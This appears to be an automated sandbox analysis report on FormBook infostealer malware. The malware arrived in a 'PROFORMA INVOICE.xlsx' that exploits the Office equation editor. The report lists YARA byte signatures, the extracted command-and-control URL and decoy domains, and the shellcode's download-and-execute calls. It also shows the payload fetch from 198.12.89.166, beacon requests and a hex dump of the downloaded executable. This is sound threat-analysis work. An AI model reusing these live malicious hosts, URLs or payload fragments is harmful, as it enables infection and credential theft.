4.2.vbc.exe.3842f58.9.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.vbc.exe.3842f58.9.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xd7b20:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd7eba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x102940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x102cda:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12c760:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12cafa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe525d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11007d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x139e9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe4d09:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x10fb29:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139949:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe535f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11017f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x139f9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe54d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1102f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13a117:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xd88d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1036f2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12d512:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
4.2.vbc.exe.3842f58.9.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xe7721:$sqlite3step: 68 34 1C 7B E1 0xe7834:$sqlite3step: 68 34 1C 7B E1 0x112541:$sqlite3step: 68 34 1C 7B E1 0x112654:$sqlite3step: 68 34 1C 7B E1 0x13c361:$sqlite3step: 68 34 1C 7B E1 0x13c474:$sqlite3step: 68 34 1C 7B E1 0xe7750:$sqlite3text: 68 38 2A 90 C5 0xe7875:$sqlite3text: 68 38 2A 90 C5 0x112570:$sqlite3text: 68 38 2A 90 C5 0x112695:$sqlite3text: 68 38 2A 90 C5 0x13c390:$sqlite3text: 68 38 2A 90 C5 0x13c4b5:$sqlite3text: 68 38 2A 90 C5 0xe7763:$sqlite3blob: 68 53 D8 7F 8C 0xe788b:$sqlite3blob: 68 53 D8 7F 8C 0x112583:$sqlite3blob: 68 53 D8 7F 8C 0x1126ab:$sqlite3blob: 68 53 D8 7F 8C 0x13c3a3:$sqlite3blob: 68 53 D8 7F 8C 0x13c4cb:$sqlite3blob: 68 53 D8 7F 8C
9.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
9.0.vbc.exe.400000.7.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.7.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.7.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
9.0.vbc.exe.400000.7.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.7.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.7.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
9.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
9.0.vbc.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.27da9ec.5.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
4.2.vbc.exe.27da9ec.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x21fe1e:$v1: SbieDll.dll 0x21fe38:$v2: USER 0x21fe44:$v3: SANDBOX 0x21fe56:$v4: VIRUS 0x21fea6:$v4: VIRUS 0x21fe64:$v5: MALWARE 0x21fe76:$v6: SCHMIDTI 0x21fe8a:$v7: CURRENTUSER
9.0.vbc.exe.400000.9.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.9.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
Click to see the 20 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.12.89.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2212, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2212, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.dems-clicks.com/n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH	Avira URL Cloud: Label: malware
Source: http://www.employeebnsf.com/n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsjonesc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}

Multi AV Scanner detection for submitted file

Source: PROFORMA INVOICE.xlsx	Virustotal: Detection: 35%			Perma Link
Source: PROFORMA INVOICE.xlsx	ReversingLabs: Detection: 24%

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Source: 9.0.vbc.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.12.89.166 Port: 80

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.997655136.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070445189.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.996323896.0000000000580000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe
Source:	Binary string: mstsc.pdb source: vbc.exe, 00000009.00000002.1070927704.0000000001140000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000009.00000003.1067795163.0000000001140000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.1068222397.0000000002C30000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: C:\Windows\SysWOW64\mstsc.exe

Code function: 11_2_000D1660 FindFirstFileW,FindNextFileW,FindClose,

11_2_000D1660

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03690401
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03690462 ShellExecuteExW,ExitProcess,	2_2_03690462
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03690396 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03690396
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0369044B ShellExecuteExW,ExitProcess,	2_2_0369044B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0369030A URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_0369030A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03690480 ExitProcess,	2_2_03690480
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03690326 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03690326
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036902F1 ExitProcess,	2_2_036902F1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036903B0 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_036903B0

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 198.12.89.166:80

Source: global traffic

DNS query: name: www.employeebnsf.com

Source: C:\Users\Public\vbc.exe

Code function: 4x nop then pop edi

9_2_00417317

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 198.12.89.166:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.employeebnsf.com
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.171 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.183.8.183 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dems-clicks.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.admincost.com/n6g4/

Source: global traffic	HTTP traffic detected: GET /n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ== HTTP/1.1Host: www.employeebnsf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:10:55 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sat, 14 May 2022 08:24:47 GMTETag: "b2a00-5def4862be45b"Accept-Ranges: bytesContent-Length: 731648Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4f 67 7f 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 20 0b 00 00 08 00 00 00 00 00 00 0a 3f 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 3e 0b 00 4f 00 00 00 00 40 0b 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 b9 01 00 80 47 01 00 03 00 00 00 9d 00 00 06 08 01 03 00 b0 3d 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 1b 00 00 0a 00 00 2a 46 02 28 1b 00 00 0a 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 1c 00 00 0a 00 00 2a 2e 02 03 04 28 1d 00 00 0a 00 00 2a 2e 02 03 04 28 1e 00 00 0a 00 00 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 26 02 28 01 00 00 06 00 00 2a 46 02 28 01 00 00 06 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 03 00 00 06 00 00 2a 2e 02 03 04 28 04 00 00 06 00 00 2a 2e 02 03 04 28 05 00 00 06 00 00 2a 00 13 30 02 00 18 00 00 00 01 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d4 01 00 06 0b 2b 00 07 2a 13 30 02 00 18 00 00 00 02 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d7 01 00 06 0b 2b 00 07 2a 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f da 01 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d9 01 00 06 0b 2b 00 07 2a 00 00 0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_03690401

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: INTERXSCH INTERXSCH
Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE

Source: EQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.166/55/vbc.exeg
Source: EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.166/55/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.166/55/vbc.exej
Source: EQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.166/55/vbc.exen
Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
